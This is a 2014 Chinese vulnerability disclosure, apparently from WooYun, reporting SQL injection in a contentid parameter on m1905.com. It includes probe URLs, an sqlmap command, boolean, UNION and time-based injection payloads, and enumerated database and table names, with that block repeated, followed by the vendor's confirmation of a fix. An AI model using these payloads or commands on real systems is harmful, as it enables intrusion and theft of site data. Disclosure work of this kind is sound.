漏洞详情

披露状态:

2014-03-08: 细节已通知厂商并且等待厂商处理中
2014-03-14: 厂商已经确认,细节仅向厂商公开
2014-03-24: 细节向核心白帽子及相关领域专家公开
2014-04-03: 细节向普通白帽子公开
2014-04-13: 细节向实习白帽子公开
2014-04-22: 细节向公众公开

简要描述:

m1905.com 主站SQL注射 可致数据库全部泄漏,使用SQLMAP取得数据库表名(仅表名)证明危害,不再继续深入,望尽快确认修补

详细说明:

漏洞位置:

http://www.m1905.com/special/mshow.php?contentid=1109&specialid=356&tpl=freshman_file



normal.png



先粗略用 and 1=1 和 and 1=2 感性认识一下

http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=1&specialid=356&tpl=freshman_file



normal2.png



http://www.m1905.com/special/mshow.php?contentid=1109%20and%201=2&specialid=356&tpl=freshman_file



normal3.png





然后SQLMAP取得数据库信息(仅演示获取数据表名称,不再继续深入)

C:\Users\Administrator>sqlmap.py -u "www.m1905.com/specia/mshow.php?contentid=1109&specialid=356&tpl=freshman_file" -p contentid --tables





qlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: GET
Parameter: contentid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: contentid=1109 AND 2160=2160&specialid=356&tpl=freshman_file

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: contentid=1109 UNION ALL SELECT CONCAT(0x7179637a71,0x56546d4e704b78764d75,0x7178777671),NULL,NULL#&specialid=356&tpl=freshman_file

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: contentid=1109 AND SLEEP(5)&specialid=356&tpl=freshman_file
---
back-end DBMS: MySQL 5.0.11
Database: ucenter
[1 table]
+---------------------------------------+
| uc_vars |
+---------------------------------------+

Database: cms
[273 tables]
+---------------------------------------+
| HdVideoEncode |
| cms_admin |
| cms_admin_role |
| cms_admin_role_priv |
| cms_ads |
| cms_ads_place |
| cms_ads_stat |
| cms_announce |
| cms_area |
| cms_ask |
| cms_ask_actor |
| cms_ask_credit |
| cms_ask_posts |
| cms_ask_vote |
| cms_attachment |
| cms_author |
| cms_block |
| cms_c_cctv6film |
| cms_c_disc |
| cms_c_dm |
| cms_c_downfile |
| cms_c_entertainment |
| cms_c_film |
| cms_c_film_20100519 |
| cms_c_filmtable |
| cms_c_game |
| cms_c_info |
| cms_c_ku6video |
| cms_c_live |
| cms_c_magazine |
| cms_c_mainstar |
……………………省略好多数据表…………………………
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

漏洞证明:

然后SQLMAP取得数据库信息(仅演示获取数据表名称,不再继续深入)

C:\Users\Administrator>sqlmap.py -u "www.m1905.com/specia/mshow.php?contentid=1109&specialid=356&tpl=freshman_file" -p contentid --tables





qlmap identified the following injection points with a total of 36 HTTP(s) requests:
---
Place: GET
Parameter: contentid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: contentid=1109 AND 2160=2160&specialid=356&tpl=freshman_file

Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: contentid=1109 UNION ALL SELECT CONCAT(0x7179637a71,0x56546d4e704b78764d75,0x7178777671),NULL,NULL#&specialid=356&tpl=freshman_file

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: contentid=1109 AND SLEEP(5)&specialid=356&tpl=freshman_file
---
back-end DBMS: MySQL 5.0.11
Database: ucenter
[1 table]
+---------------------------------------+
| uc_vars |
+---------------------------------------+

Database: cms
[273 tables]
+---------------------------------------+
| HdVideoEncode |
| cms_admin |
| cms_admin_role |
| cms_admin_role_priv |
| cms_ads |
| cms_ads_place |
| cms_ads_stat |
| cms_announce |
| cms_area |
| cms_ask |
| cms_ask_actor |
| cms_ask_credit |
| cms_ask_posts |
| cms_ask_vote |
| cms_attachment |
| cms_author |
| cms_block |
| cms_c_cctv6film |
| cms_c_disc |
| cms_c_dm |
| cms_c_downfile |
| cms_c_entertainment |
| cms_c_film |
| cms_c_film_20100519 |
| cms_c_filmtable |
| cms_c_game |
| cms_c_info |
| cms_c_ku6video |
| cms_c_live |
| cms_c_magazine |
| cms_c_mainstar |
……………………省略好多数据表…………………………
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

修复方案:

做参数判断,过滤



望尽快确认漏洞等级,修复网站漏洞

版权声明:转载请注明来源 lxj616@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2014-03-14 13:22

厂商回复:

感谢反馈

最新状态:

2014-03-14:该漏洞已经封闭,再次感谢。


漏洞评价: